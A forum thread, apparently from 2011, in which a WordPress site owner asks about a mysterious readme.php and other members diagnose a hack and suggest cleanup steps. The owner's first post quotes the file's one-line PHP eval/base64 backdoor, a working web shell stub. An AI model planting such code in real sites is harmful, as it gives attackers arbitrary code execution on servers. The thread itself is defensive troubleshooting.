homepage Welcome to WebmasterWorld Guest from 107.20.131.154
register, free tools, login, search, subscribe, help, library, announcements, recent posts, open posts,
Accredited PayPal World Seller

Home / Forums Index / Code, Content, and Presentation / PHP Server Side Scripting
Forum Library, Charter, Moderators: coopster & jatar k

PHP Server Side Scripting Forum

    
What is readme.php?
vphoner




msg:4335477
 12:34 am on Jul 6, 2011 (gmt 0)

On a wordpress site, I checked past backups and there was no readme.php file. In June, one suddenly appeared and there are a lot of accesses to that file according to my log file.

Here is what is in the file:

<? @eval(base64_decode($_POST['evl']));@require_once('/tmp/sessionbroker.php'); ?>

Any idea what this file is doing, and why its one of the most hit files according to my log file?

When I access it, I just get a blank page.

Maybe a coincidence, but the day after this appeared my traffic dropped substantially on google.

 

vphoner




msg:4335483
 12:46 am on Jul 6, 2011 (gmt 0)

I can add that it appears that the referring urls (calling readme.php) are pages within my site that are calling the readme.php. Very strange. I have searched and there are no readme.php calls or links on any of my pages. Even searched the SQL database.

penders




msg:4335836
 4:22 pm on Jul 6, 2011 (gmt 0)

It certainly looks like your site has been hacked. I would delete
readme.php immediately and patch up your WordPress install if applicable.

@eval(base64_decode($_POST['evl']));


This line allows anyone to pass any PHP code to your server (encoded as part of the POST data) and execute it ON YOUR SERVER! This could do pretty much anything! 'evl' looks a lot like 'evil' to me!

Once the hackers have been able to hack your site, they could be using this script repeatedly, hence increase in traffic. It could be used to try and infect other sites, in which case your site has now become the source of the 'virus' which could explain why you dropped on Google!?

vphoner




msg:4335895
 5:40 pm on Jul 6, 2011 (gmt 0)

I replaced the readme.php with the "evil" code with a blank one and it has not been replaced by the evil doers. What other cleanup do I have to do? There is no call to readme.php in the code that I have searched or the database. Where could it be calling from? I notice that after every legitimate page is called, a readme.php is called. So its being called internally.

After cleaning up, will google naturally see that the bad code is going when it reindexes readme.php or do you have to contact them for reinclusion?

I couldn't believe it shut down the google clicks in only a day after infestation. I see no symptoms other than a lot of readme.php accesses.

penders




msg:4335956
 7:33 pm on Jul 6, 2011 (gmt 0)

There is no call to readme.php in the code that I have searched or the database. Where could it be calling from? I notice that after every legitimate page is called, a readme.php is called. So its being called internally.


It is not necessarily being called internally. Any external site could be making the (initial) request, and requesting the legitimate pages, and faking the referrer to make it look like it is being called internally. Once called the script could even be calling itself?!

@require_once('/tmp/sessionbroker.php');


Do you have a sessionbroker.php file? (This is outside of your document root - public html folder.) Is this a hacked file (which I suspect) or part of WordPress? Is the date/time of this file the same as readme.php?

I think Google will naturally reindex your site over time. You could check in Google's Webmaster Tools for any info.

Other cleanup... Well, they got in somehow, so you should change your passwords and update your WordPress installation as necessary.

vphoner




msg:4336761
 4:11 am on Jul 8, 2011 (gmt 0)

I did notice that that according to the paths in my log file, only wordpress posts get the readme.php called after they load. Pages or tag pages do not get the call to readme.php. I don't have a sessionbroker.php (searched for it). The strange thing is that I see no changes on the site or hidden links/spam. Nothing that I can see. Checked the source code of many pages using the browser window show source.

lexipixel




msg:4336763
 4:27 am on Jul 8, 2011 (gmt 0)

You've DEFINITELY been hacked... Chances are the code has spread to other files on your server.

See: [webmasterworld.com...]

lucy24




msg:4336776
 5:27 am on Jul 8, 2011 (gmt 0)

Do WordPress people and PHP people simply not talk to each other? The OP's two threads have taken off in entirely different directions :)

[webmasterworld.com...]

g1smd




msg:4336815
 7:39 am on Jul 8, 2011 (gmt 0)

Normally, cross-posting a question wastes everyone's time. This is the first time in a decade of forum usage that I have seen something useful come of it. :)

penders




msg:4336918
 1:25 pm on Jul 8, 2011 (gmt 0)

The OP's two threads have taken off in entirely different directions...


Are they really so different? Both agree the site has been hacked.

Although the site might have been hacked via a WordPress vulnerability, this type of hack looks fairly generic and similar hacks could happen to any site that has security vulnerabilities.

<? @eval(...


Interesting that this requires short_open_tags to be enabled on the server.

I did notice that that according to the paths in my log file, only wordpress posts get the readme.php called after they load. Pages or tag pages do not get the call to readme.php.


May be wordpress post URLs are easier to gather? Or may be that was all the hacker reqd? As mentioned, it could be that the external site is requesting both the wordpress post (having gathered the URLs?) and is then requesting readme.php. Or did you find that if YOU requested the wordpress post, YOU also requested readme.php? Must admit I'm struggling with the idea that readme.php could be requested as a result of a wordpress post being requested AND both URLs appear as individual requests in the logs AND nothing strange appears in the page source. However, there could be some kind of server-side redirect(?!) going on which would indicate that some other files have also been compromised.

Check .htaccess for any additional code that might have been added. If other wordpress files have been compromised then "readme.php" might not appear as is; it could be encoded in some way which will make searching difficult.

vphoner




msg:4337272
 1:52 am on Jul 9, 2011 (gmt 0)

Yes, when anyone requests a wordpress post, it immediately requests the readme.php. I can see this using weblog analysis of the paths that each user takes, and the readme.php is the next file accessed by everyone that requests a post. I have replaced the readme.php with one without any code in it to protect my visitors.

I have searched through hundreds of files, both manually and by keyword, and have not been able to find any malicious code, although I may not know what to look for. Which .htaccess should I look at, the root directory one, or others that are in other folders? What would I find? A redirect to an external URL?

lexipixel




msg:4337300
 4:50 am on Jul 9, 2011 (gmt 0)

Which .htaccess should I look at, the root directory one, or others that are in other folders? What would I find? A redirect to an external URL?


If your site in on a shared host, and you are not skilled at searching from a prompt, I would ask the hosting company to look it over -- there is a chance you are spreading something to visitors -- and also a chance that the server has been compromised.

penders




msg:4337351
 11:07 am on Jul 9, 2011 (gmt 0)

Which .htaccess should I look at, the root directory one, or others that are in other folders?


Do you have many .htaccess files?! Check the dates of these files - were any updated at the time readme.php appeared? Any .htaccess file that is 'above' the URL you are accessing could be affecting you. (Ideally you should only really have 1 .htaccess file in the root directory as otherwise the site can become harder to maintain.)

You could also check the request/response headers using a browser extension such as livehttpheaders for Firefox which should show any redirection that might be happening.

Global Options:
 top home search open messages active posts  
 

Home / Forums Index / Code, Content, and Presentation / PHP Server Side Scripting
rss feed

All trademarks and copyrights held by respective owners. Member comments are owned by the poster.
Terms of Service ¦ Privacy Policy ¦ Report Problem ¦ About
© Webmaster World 1996-2014 all rights reserved